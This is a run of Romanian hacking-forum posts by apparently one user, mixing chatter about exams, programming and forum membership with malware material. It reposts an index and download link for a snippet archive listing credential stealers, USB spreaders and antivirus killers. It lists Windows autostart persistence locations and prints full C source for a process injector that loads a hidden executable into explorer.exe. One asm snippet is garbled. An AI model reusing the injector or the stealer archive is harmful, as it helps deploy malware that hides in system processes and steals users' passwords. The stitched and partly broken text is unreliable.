Nytro

Erau niste chestii, se mai postau, dar acum e alte vremuri, nu mai avem timp.

Posteaza si tu conturi daca tot ai multe si nu ai ce face cu ele. Vei face cativa membrii fericiti.

Pff, la porcaria de infoeducatie, cand am participat si eu, habar nu aveau cei din juriu ce e ala PHP. De FTP sau PHPMyAdmin nici nu e nevoie sa mai zic. Au castigat niste flash-uri de 3 lei, desigur, pentru ca erau colorate... PS: Nu poti spune ca sti un limbaj de programare din ceea ce faci la scoala. La scoala nu faci programare decat extrem de putin, la scoala se face algoritmica.

C++ (sau C mai bine zis) sau Assembly. Asta deoarece in general programatorii care lucreaza in C++ si mai ales in Assembly sunt mult mai experimentati.

Pe baza de cat sunt de dastepti, pe baza de invitatii, pe baza de care tine mai mult la bautura... De ce sa fie o anumita cerinta sa fi membru pe forum? E atat de important sa fi membru aici? Ce ar avea de castigat? Eu as zice sa le cerem bani atunci...

Nu prea inteleg de ce vrei VIP... Pai sa vad, daca fac fifty-fifty cu kwe, sau el s-a lasat de baut...?

Eu mi-am luat niste memoranduri cred ca se cheama, carticele in format mic, cu scris mic si cu multe prostii prin ele. Dar la mate sunt sugestii de rezolvari, nu vor fi subiectele de anul asta... La mate imi e frica... Si totusi nu stiu daca sa ma risc sa copiez (daca e "periculos"). Mai bine iau un 5 (la mate nu stiu daca voi fi in stare) si sunt multumit.

Daca veniti de pe hellsoft si hackforums e clar, ma inclin in fata voastra.

Teoretic se pot face si virusi in HTML. <a href="aaaaaaa_nops_shellcode">A</a> Si sa fie browser engine-ul prost, sa aibe buffer overflow

Eu vreau un butoias de Calrsberg

E multi care nu are ce face pe acasa xcata, se baga si ei in seama. In practica se poate folosi orice limbaj din care se poate apela o functie API. Se foloseste Visual Basic pentru ca e practic mai simplu, mai usor de invatat. E mai "smecher" C++. Si cred ca principalul avantaj il reprezinta pointerii. Si faptul ca pentru C++ exista deja acele headere. Decat incluzi <window.h> si apelezi functia, nu trebuie sa o declari. Dar in mare, ce poti face in C++ (aproape orice, cred ca nu chiar orice) poti face si in Visual Basic, sau C# sau alt limbaj de programare.

Pai e important. Eu vreau sa vad care din zmeii de mai sus e mai dastept.

Eu cred ca va dau ban la toti ca vad ca sunteti prea destepti pentru lumea asta...

Driver-ul pe care il are kernelul ofera doar suport read-only pentru NTFS. Dar ntfs-3g ofera suport read-write. Da, trebuiau montate daca nu erau montate automat cum ar trebui sa faca un sistem de operare modern... Eu vad in asta o bila neagra pentru backtrack. Bine, si una pentru Tinky.

Ma uitam la fetele astora din corelan, si mi se par putin ciudati

Unii au bac Eu o sa fiu mai "implicat" dupa ce termin cu bacul apoi cu admiterea. Va ramane pentru ceva timp cum este acum.

Interesant Si el e cel care l-a descoperit: http://www.corelan.be:8800/wp-content/uploads/2010/03/tecr0cFace1.jpg

De fapt au fost postate si acolo de cineva care le luase de altundeva. Opensc nu e tocmai raiul programatorilor.

Daca nu e mult de munca ma bag eu. Nu stau insa prea bine la CSS, dar ma descurc

Source: http://www.opensc.ws/snippets/10961-release-w0rmys-codebase-v2-0-a.html Snippets: Bash - Backup Script.txt Bash - Battery Life.txt Bash - BlackJack.txt Bash - Change (mask) the MAC address on your nic.txt Bash - Detect then eject the cdrom.txt Bash - File Limiter.txt Bash - PPP Connection Checker.txt Bash - Recursive Linecount in directory.txt Bash - Resolve&Display your IP Address.txt Bash - Retreive the complete list of ports.txt Bash - Setting up common aliases.txt Bash - Simple Bash backup script.txt Bash - Simple firewall script.txt Bash - Take Screenshots of Xwindows.txt C# - Add proxy support to webbrowser.txt C# - Anti Sandboxie.txt C# - AntiSandboxie.txt C# - Anti ThreatExpert.txt C - Binary Adder.txt C# - Calculate an exponent.txt C# - CD Key Stealer.txt C# - Check Avaible Posts.txt C# - Check for 64bits OS.txt C# - Check if a file is already open (or read only).txt C# - Check if a printer is offline or online.txt C# - Check if a process is running.txt C# - Check if the CD-ROM is loaded.txt C# - Count vowels in a string.txt C# - Create a new net user.txt C# - Create local Windows user account.txt C - Creates a magic square.txt C - DateTime with windows.h.txt C# - Delete registry key value in HKEY_CLASSES_ROOT.txt C# - Delete Self.txt C# - Desactivate UAC.txt C# - Disable Task Manager.txt C++ - Disable Task Manager.txt C# - Downloader.txt C - Echo.txt C# - Empty Recycle Bin.txt C# - Encryption Class.txt C# - EOF Data.txt C# - FileZilla Stealer.txt C# - Generate a random color with XNA.txt C# - Generate password.txt C# - Get 3 letters computer country name.txt C# - Get a file's MD5 Hash.txt C# - Get a HTML Page's Title.txt C# - Get current users profile type (using Win32 API).txt C# - Get Headers from a website.txt C# - Get info about drives installed.txt C# - Get info about physical memory.txt C# - Get IP Information.txt C# - Get recycle bin's size and file count.txt C# - Get RecycleBin's size and file count.txt C# - Gets the contents of a pastebin entry by id.txt C# - Getting the HEX.txt C# - Get UNC path of mapped drives.txt C# - Get users default browser.txt C# - Get your Gmail contact list.txt C - Gnome Sort.txt C# - Hiding console window.txt C# - IP address range finder helper class.txt C# - Kill Ad-Adware.txt C# - Kill a process by user.txt C# - Kill Malwarebytes Anti-Malware.txt C# - Kill SpyBot Search&Destroy.txt C# - Mutex.txt C - Name of current user.txt C# - Open Windows Firewall Port.txt C# - Post to Pastebin!.txt C - ReadWord.txt C# - Rendering text with a shadow in XNA.txt C++ - Restart your computer.txt C# - Retrieve all computers on network.txt C# - Retrieve list of avaible printer ports.txt C# - Send Email with Attachment.txt C# - Session for WinForms.txt C# - Set default printer.txt C# - ShiftList.txt C# - Show&Hide desktop icons.txt C# - Show&hide Windows Taskbar.txt C# - Simple 2D line in XNA.txt C# - Split String.txt C# - Static dll injector.txt C# - Take screenshot.txt C# - USB Spread.txt C# - Use WMI to get a list of all installed printers.txt C# - Use WMI to get the system's up-time.txt C# - uTorrent seeder.txt C# - Windows autostart.txt C# - XOR Encryption.txt Delphi - Bytes to real size.txt Delphi - Default Browser.txt Delphi - Disable XP Firewall.txt Delphi - Get File Info.txt Delphi - Ip&Port Check Utility.txt Delphi - Little injection.txt Delphi - Screenshot with mouse position.txt Delphi - Uptime (Spy-Net).txt F# - AES Encryption.txt F# - IRC Bot.txt Lisp - A Clojure function to find the average of an arbitrary number of numbers.txt Lisp - A function to flip the arguments of another function in Clojure.txt Lisp - Compute factorial in Clojure.txt Lisp - Computer Generated HAIKU.txt Lisp - Example of using refs to maintain, alter, and use mutable state in Clojure.txt Lisp - Fibonacci Sequence.txt Lisp - Fibonancci Sequence.txt Lisp - File IO example using c.c.duck-streams in Clojure.txt Lisp - Function to find the max value in a sequence in Clojure.txt Lisp - GPA Calculator.txt Lisp - Swing example in Clojure.txt Lisp - Tic-Tac-Toe.txt Python - CS Server Info.txt Python - Get TITLE.txt Python - Google Search.txt Python - IRC Bot (l33t).txt Python - IRC Bot.txt Python - MD5 Search.txt Python - Skype Bot.txt Ruby - Angle Conversion.txt Ruby - Bandwidth Usage in Linux.txt Ruby - Check if a number is prime.txt Ruby - Defficient Number.txt Ruby - Get Confirmation.txt Ruby - Hangman.txt Ruby - Regression Line.txt Ruby - Reverse a string.txt Ruby - ROT13.txt Ruby - Sum of any series.txt Ruby - Sum of Divisors.txt Ruby - Write a number in English.txt VB6 - Admin Check.txt VB6 - Automatic shutdown for windows in VBS.txt VB6 - Change Desktop Settings via registry.txt VB6 - Change System Date Format.txt VB6 - Check if a file exists.txt VB6 - Check if exe is running.txt VB6 - Close all forms in your applications.txt VB6 - Convert Binary To Decimal.txt VB6 - Copy all files from directory to another.txt VB6 - Detect Windows Version.txt VB6 - Disable Ctrl+Alt+Del.txt VB6 - Download a file from the Internet.txt VB6 - Download file using FTP.txt VB6 - DynDNS Stealer.txt VB6 - Easy read&write to Windows registry.txt VB6 - File Download to Temp Dir.txt VB6 - FileZilla Stealer.txt VB6 - Find your application's path.txt VB6 - Get default browser in 5 lines.txt VB6 - Get MSN Passwords.txt VB6 - Get OS Version.txt VB6 - Get Screen Resolution.txt VB6 - Get System Volume Information.txt VB6 - Get Windows Username.txt VB6 - Hangman.txt VB6 - Kill a file in use.txt VB6 - Open&Close CD ROM.txt VB6 - Password Generator.txt VB6 - Prevent a program from running.txt VB6 - Read Registry.txt VB6 - Running Programs Using VBScript.txt VB6 - Send Batch Email.txt VB6 - Show&Hide Taskbar (WINDOWS).txt VB6 - Shutdown Windows.txt VB6 - Simple en&decryption.txt VB6 - String Rotation.txt VB6 - System Start Time.txt VB6 - Tic Tac Toe.txt VB6 - Turn Off Monitor.txt VB6 - Upload file to FTP Server.txt VB6 - Windows Running Time.txt VB6 - Windows XP Task manager Disabler&Enabler.txt VB6 - Write to registry.txt VB6 - XOR Encryption Function.txt VB6 - Zip files with WinZip in VB6.txt VB.NET - 4chan spammer.txt VB.NET - Add to startup (Registry).txt VB.NET - Animating Text.txt VB.NET - Anti Modules.txt VB.NET - Auto Crop Image.txt VB.NET - Base64 to image.txt VB.NET - Bomb noise.txt VB.NET - Calculated Click.txt VB.NET - Calender.txt VB.NET - Change Desktop Background.txt VB.NET - Change the language of your application.txt VB.NET - Change Wallpaper.txt VB.NET - Check Battery Status.txt VB.NET - Check if exe is running.txt VB.NET - Check if file is in use.txt VB.NET - Check if username is in use.txt VB.NET - Check URL for availability.txt VB.NET - Check Windows Password.txt VB.NET - Clear IE Browser History&Cookies.txt VB.NET - Convert file size to KB, MB, GB and TB.txt VB.NET - Convert file size to KB,MB,GB, TB.txt VB.NET - Corrupt.txt VB.NET - Cripple EXE.txt VB.NET - Cryptographu - Encryptions&Decryptions.txt VB.NET - Date Extensions.txt VB.NET - Delete Cookies.txt VB.NET - Disable Firewall.txt VB.NET - Disable 'Show Hidden Files and Folders Option'.txt VB.NET - Disable [X], ALT+F4, CTRL+W and context.txt VB.NET - Empty Recycle Bin.txt VB.NET - Enumerate Installed Software.txt VB.NET - FireFTP Passwords.txt VB.NET - Force Steam login.txt VB.NET - Format a phone number.txt VB.NET - FormatWith.txt VB.NET - Generate Captcha.txt VB.NET - Get all table & Column names from database.txt VB.NET - GetBetweenAll.txt VB.NET - GetBetween.txt VB.NET - Get COD4 Key.txt VB.NET - Get default browser path.txt VB.NET - Get External IP.txt VB.NET - Get Folder Size.txt VB.NET - Get how long the computer has been running.txt VB.NET - Get or set Desktop background color.txt VB.NET - Get own Internet IP.txt VB.NET - Get percent value.txt VB.NET - Give file an attribute.txt VB.NET - Handling .ini files.txt VB.NET - Hash.txt VB.NET - Hide a process window.txt VB.NET - Instant PC Shutdown.txt VB.NET - Invert colors from image.txt VB.NET - Log file.txt VB.NET - MD5 from file.txt VB.NET - MD5 Hash.txt VB.NET - Melt File - NO DROPS.txt VB.NET - Minimize to tray.txt VB.NET - Mouse Click.txt VB.NET - MsgBox If statement.txt VB.NET - MSN Nickname Changer.txt VB.NET - MSN Spreader.txt VB.NET - Multiple File Copy.txt VB.NET - Null PE Info.txt VB.NET - Packetwise File Copy.txt VB.NET - Polymorphic RC4 Encryption.txt VB.NET - Prevent Search.txt VB.NET - Program Updater.txt VB.NET - ProgressBar code.txt VB.NET - RC4 Encryption.txt VB.NET - Read&Write EOF.txt VB.NET - Resize image to fit in picturebox.txt VB.NET - Resolution Math.txt VB.NET - Screenshot.txt VB.NET - Show system time.txt VB.NET - String & Image Conversion.txt VB.NET - Strip HTML.txt VB.NET - Test for Internet Connection.txt VB.NET - Windows Live Messenger 'Now Playing'.txt Download: http://www.2shared.com/file/tTxgNb0z/Documents.html

Nu stiu cine le-a aflat pe toate: Registry Autostart Locations 1. HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\ All values in this key are executed. 2. HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce\ All values in this key are executed, and then their autostart reference is deleted. 3. HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\ All values in this key are executed as services. 4. HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce\ All values in this key are executed as services, and then their autostart reference is deleted. 5. HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\ All values in this key are executed. 6. HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce\ All values in this key are executed, and then their autostart reference is deleted. 7. HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce\Setup\ Used only by Setup. Displays a progress dialog box as the keys are run one at a time. 8. HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Run\ Similar to the Run key from HKEY_CURRENT_USER. 9. HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\RunOnce\ Similar to the RunOnce key from HKEY_CURRENT_USER. 10. HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon The "Shell" value is monitored. This value is executed after you log in. 11. HKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed Components\ All subkeys are monitored, with special attention paid to the "StubPath" value in each subkey. 12. HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\VxD\ All subkeys are monitored, with special attention paid to the "StaticVXD" value in each subkey. 13. HKEY_CURRENT_USER\Control Panel\Desktop The "SCRNSAVE.EXE" value is monitored. This value is launched when your screen saver activates. 14. HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager The "BootExecute" value is monitored. Files listed here are Native Applications that are executed before Windows starts. 15. HKEY_CLASSES_ROOT\vbsfile\shell\open\command\ Executed whenever a .VBS file (Visual Basic Script) is run. 16. HKEY_CLASSES_ROOT\vbefile\shell\open\command\ Executed whenever a .VBE file (Encoded Visual Basic Script) is run. 17. HKEY_CLASSES_ROOT\jsfile\shell\open\command\ Executed whenever a .JS file (Javascript) is run. 18. HKEY_CLASSES_ROOT\jsefile\shell\open\command\ Executed whenever a .JSE file (Encoded Javascript) is run. 19. HKEY_CLASSES_ROOT\wshfile\shell\open\command\ Executed whenever a .WSH file (Windows Scripting Host) is run. 20. HKEY_CLASSES_ROOT\wsffile\shell\open\command\ Executed whenever a .WSF file (Windows Scripting File) is run. 21. HKEY_CLASSES_ROOT\exefile\shell\open\command\ Executed whenever a .EXE file (Executable) is run. 22. HKEY_CLASSES_ROOT\comfile\shell\open\command\ Executed whenever a .COM file (Command) is run. 23. HKEY_CLASSES_ROOT\batfile\shell\open\command\ Executed whenever a .BAT file (Batch Command) is run. 24. HKEY_CLASSES_ROOT\scrfile\shell\open\command\ Executed whenever a .SCR file (Screen Saver) is run. 25. HKEY_CLASSES_ROOT\piffile\shell\open\command\ Executed whenever a .PIF file (Portable Interchange Format) is run. 26. HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\ Services marked to startup automatically are executed before user login. 27. HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Winsock2\Parameters\Protocol_Catalog\Catalog_Entries\ Layered Service Providers, executed before user login. 28. HKEY_LOCAL_MACHINE\System\Control\WOW\cmdline Executed when a 16-bit Windows executable is executed. 29. HKEY_LOCAL_MACHINE\System\Control\WOW\wowcmdline Executed when a 16-bit DOS application is executed. 30. HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit Executed when a user logs in. 31. HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad\ Executed by explorer.exe as soon as it has loaded. 32. HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\run Executed when the user logs in. 33. HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\load Executed when the user logs in. 34. HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\run\ Subvalues are executed when Explorer initialises. 35. HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\run\ Subvalues are executed when Explorer initialises. Folder Autostart Locations 1. windir\Start Menu\Programs\Startup\ 2. User\Startup\ 3. All Users\Startup\ 4. windir\system\iosubsys\ 5. windir\system\vmm32\ 6. windir\Tasks\ File Autostart Locations 1. c:\explorer.exe 2. c:\autoexec.bat 3. c:\config.sys 4. windir\wininit.ini 5. windir\winstart.bat 6. windir\win.ini - [windows] "load" 7. windir\win.ini - [windows] "run" 8. windir\system.ini - [boot] "shell" 9. windir\system.ini - [boot] "scrnsave.exe" 10. windir\dosstart.bat 11. windir\system\autoexec.nt 12. windir\system\config.nt Sper sa va ajute

Author: #Zero Zero: Well, this code inject the executable that it has on resource section into 'explorer.exe' process. The code really injects the executable, this will not create a new 'explorer.exe' process. #pragma comment (linker,"/NODEFAULTLIB") #pragma comment (linker,"/ENTRY:main") #include <windows.h> #include <Tlhelp32.h> #include "resource.h" int main() { PIMAGE_DOS_HEADER IDH; PIMAGE_NT_HEADERS INTH; PIMAGE_SECTION_HEADER ISH; //Cargamos el resource HRSRC hResource=FindResourceA(NULL,(LPCSTR)MAKEINTRESOURCE(IDR_EXE1),"EXE"); DWORD ResourceSize=SizeofResource(NULL,hResource); HGLOBAL hGlob=LoadResource(NULL,hResource); LPSTR lpFileMaped=(LPSTR)LockResource(hGlob); //Obtenemos la cabecera DOS y PE en las estructuras IDH=(PIMAGE_DOS_HEADER)&lpFileMaped[0]; INTH=(PIMAGE_NT_HEADERS)&lpFileMaped[IDH->e_lfanew]; DWORD PID=0; HANDLE hSnapshot=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0); PROCESSENTRY32 pInfo; pInfo.dwSize=sizeof(PROCESSENTRY32); //Obtenemos el PID del 'explorer.exe' Process32First(hSnapshot,&pInfo); for(;lstrcmpA(pInfo.szExeFile,"explorer.exe") { Process32Next(hSnapshot,&pInfo); } CloseHandle(hSnapshot); PID=pInfo.th32ProcessID; //Abrimos el proceso en el que nos inyectaremos HANDLE hProcess=OpenProcess(PROCESS_ALL_ACCESS,FALSE,PID); //Creamos el buffer del tamaño del SizeOfImage en el que cargaremos el ejecutable LPSTR ExeBuffer=(LPSTR)VirtualAllocEx(hProcess,0,INTH->OptionalHeader.SizeOfImage,MEM_RESERVE|MEM_COMMIT,PAGE_EXECUTE_READWRITE); //Copiamos la cabecera DOS y PE al buffer WriteProcessMemory(hProcess,&ExeBuffer[0],&lpFileMaped[0],INTH->OptionalHeader.SizeOfHeaders,0); //Copiamos las secciones en su VirtualOffset en el buffer for(DWORD i=0;i<INTH->FileHeader.NumberOfSections;i++) { ISH=(PIMAGE_SECTION_HEADER)&lpFileMaped[IDH->e_lfanew+sizeof(IMAGE_NT_HEADERS)+sizeof(IMAGE_SECTION_HEADER)*i]; WriteProcessMemory(hProcess,&ExeBuffer[ISH->VirtualAddress],&lpFileMaped[ISH->PointerToRawData],ISH->SizeOfRawData,0); } //Calculamos el delta entre la dirección del buffer y el ImageBase DWORD Delta=(((DWORD)ExeBuffer)-INTH->OptionalHeader.ImageBase); //------------------------------------------------------------ /* -Reubicamos la dirección base del ejecutable <img src="http://zero.serhackernoesilegal.com/wp-includes/images/smilies/icon_biggrin.gif" alt=":D" class="wp-smiley"> - */ //------------------------------------------------------------ //Si no hay tabla de reubicación, salimos if(INTH->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].Size==0) { MessageBoxA(0,"No hay relocation table!",0,0); return false; } //Obteemos el Image Base Relocation //Copiamos el Image Base Relocation de los datos en el proceso a un buffer en el nuestro para //poder trabajar con él más comodamente PIMAGE_BASE_RELOCATION IBR=(PIMAGE_BASE_RELOCATION)GlobalAlloc(GPTR,sizeof(IMAGE_BASE_RELOCATION)); PIMAGE_BASE_RELOCATION PIBR=(PIMAGE_BASE_RELOCATION)(ExeBuffer+INTH->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress); ReadProcessMemory(hProcess,(LPVOID)PIBR,IBR,sizeof(IMAGE_BASE_RELOCATION),0); //Vamos recorriendo todas las etradas del bloque for (DWORD n=0;IBR->VirtualAddress>0;n++) { //Obtenemos el Bloque de reubicación LPSTR RelocationBlock=(LPSTR)(ExeBuffer+IBR->VirtualAddress); //Obtenemos la primera entrada del bloque LPWORD RelocationEntry=(LPWORD)((LPSTR)PIBR+sizeof(IMAGE_BASE_RELOCATION)); //Recorremos todas las entradas del bloque for (DWORD i=0;i<((IBR->SizeOfBlock-sizeof(IMAGE_BASE_RELOCATION))/2);i++,RelocationEntry++) { WORD valor; ReadProcessMemory(hProcess,RelocationEntry,&valor,2,0); //Obtenemos los 4 bits que definen el tipo de reubicación DWORD type=valor>>12; //Obtenemos los 12 bits que definen la dirección de la reubicación DWORD offset=valor&0xFFF; //Si el tipo de reubicación es relativo a la dirección base, añadimso el delta if(type==IMAGE_REL_BASED_HIGHLOW) { //Añadimos a la dirección que depende del imagebase original //el delta entre el imagebase y nuestra dirección base LPDWORD newAddr=(LPDWORD)(RelocationBlock+offset); DWORD NewValue; ReadProcessMemory(hProcess,newAddr,&NewValue,4,0); NewValue+=Delta; WriteProcessMemory(hProcess,newAddr,&NewValue,4,0); } } //Vamos al siguiente bloque PIBR=(PIMAGE_BASE_RELOCATION)(((DWORD)PIBR)+IBR->SizeOfBlock); ReadProcessMemory(hProcess,(LPVOID)PIBR,IBR,sizeof(IMAGE_BASE_RELOCATION),0); } GlobalFree(IBR); //--------------------------------------------------------------------- /* -Cargamos los valores de la IAT para poder llamar a las apis- */ //--------------------------------------------------------------------- PIMAGE_THUNK_DATA ITD; PIMAGE_THUNK_DATA PITD; PIMAGE_IMPORT_BY_NAME IIBN; //Comprobamos si hay Import Data Descriptor if (INTH->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].Size>0) { //Obtenemos el Import Data Descriptor //Copiamos el Import Data Descriptor de los datos en el proceso a un buffer en el nuestro para //poder trabajar con él más comodamente PIMAGE_IMPORT_DESCRIPTOR IID=(PIMAGE_IMPORT_DESCRIPTOR)GlobalAlloc(GPTR,sizeof(IMAGE_IMPORT_DESCRIPTOR)); PIMAGE_IMPORT_DESCRIPTOR PIID=(PIMAGE_IMPORT_DESCRIPTOR)(ExeBuffer+INTH->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress); ReadProcessMemory(hProcess,(LPVOID)PIID,IID,sizeof(IMAGE_IMPORT_DESCRIPTOR),0); //Vamos recorriendo todas las Dll's importadas por el ejecutable for (;IID->Name;) { //Obtenemos la longitud del nombre de la dll DWORD szName=0; CHAR miByte=1; for(int i=0;miByte;i++) { szName=i; ReadProcessMemory(hProcess,ExeBuffer+IID->Name+i,&miByte,1,0); } //Obtenemos el nombre de la dll LPSTR lpName=(LPSTR)GlobalAlloc(GPTR,szName+1); ReadProcessMemory(hProcess,ExeBuffer+IID->Name,lpName,szName+1,0); //Cargamos la dll HMODULE hLib=LoadLibraryA(lpName); //Obtenemos la dirección al primer miembro del array Image Thunk Data's PITD=(PIMAGE_THUNK_DATA)((DWORD)ExeBuffer+IID->FirstThunk); ITD=(PIMAGE_THUNK_DATA)GlobalAlloc(GPTR,sizeof(IMAGE_THUNK_DATA)); ReadProcessMemory(hProcess,PITD,ITD,sizeof(IMAGE_THUNK_DATA),0); //Vamos recorriendo las funciones importadas for (;ITD->u1.Ordinal;) { miByte=1; //Obtenemos la longitud del nombre de la API for(int i=0;miByte;i++) { szName=i; LPSTR puntero=ExeBuffer+ITD->u1.Function+2; puntero+=i; ReadProcessMemory(hProcess,puntero,&miByte,1,0); } //Cargamos el Image Import By Name para obtener el nombre IIBN=(PIMAGE_IMPORT_BY_NAME)GlobalAlloc(GPTR,sizeof(IMAGE_IMPORT_BY_NAME)+szName); ReadProcessMemory(hProcess,ExeBuffer+ITD->u1.Function,IIBN,sizeof(IMAGE_IMPORT_BY_NAME)+szName,0); //Obtenemos la dirección de la función y la guardamos en la IAT DWORD lpAPI=(DWORD)GetProcAddress(hLib,(LPCSTR)&IIBN->Name); WriteProcessMemory(hProcess,ExeBuffer+IID->FirstThunk,&lpAPI,4,0); /* Error HERE!*/ PITD++; ReadProcessMemory(hProcess,PITD,ITD,sizeof(IMAGE_THUNK_DATA),0); } PIID++; ReadProcessMemory(hProcess,(LPVOID)PIID,IID,sizeof(IMAGE_IMPORT_DESCRIPTOR),0); GlobalFree(lpName); GlobalFree(ITD); } GlobalFree(IID); } //Obteemos el EntryPoint de ejecutable que cargamos en el buffer DWORD EntryPoint=((DWORD)ExeBuffer)+INTH->OptionalHeader.AddressOfEntryPoint; //Llamamos al EntryPoint CreateRemoteThread(hProcess,0,0,(LPTHREAD_START_ROUTINE)EntryPoint,0,0,0); return 0; } Some users told me that with some executables the code is not running. I tried to fix it for a long time, but i couldn't do it yet, so with executables who uses de C Run Time Library or some similar, code could fail. Furthermore, I let a anti-kiddie mistake, marked with a "Error Here" comment. Zero

E la moda sa ai multe programe de hack in calculator, desi nu sti nici macar ce fac. E insa si asta o idee buna, cand ai nevoie de ceva, gasesti rapid.

E o diferenta intre "infectate" si "detectate".

O metoda "draguta" de apel dinamic. Autorul nu il stiu, cred ca e vorba de "Skillless". #include <windows.h> int main() { HINSTANCE Dll = LoadLibrary("user32.dll"); DWORD(*Func)(void) = (DWORD(*)(void))GetProcAddress(Dll, "MessageBoxA"); HWND A = 0; LPCTSTR B = "Question?"; LPCTSTR C = "Title!"; UINT D = MB_ICONEXCLAMATION | MB_YESNO; asm("push %0" :: "r"(D)); asm("push %0" :: "r"(C)); asm("push %0" :: "r"(); asm("push %0" :: "r"(A)); Func(); asm("pop %0" :: "r"(A)); asm("pop %0" :: "r"(); asm("pop %0" :: "r"(C)); asm("pop %0" :: "r"(D)); FreeLibrary(Dll); return 0; } Va dati si voie seama ce face, ce functie apeleaza si cum.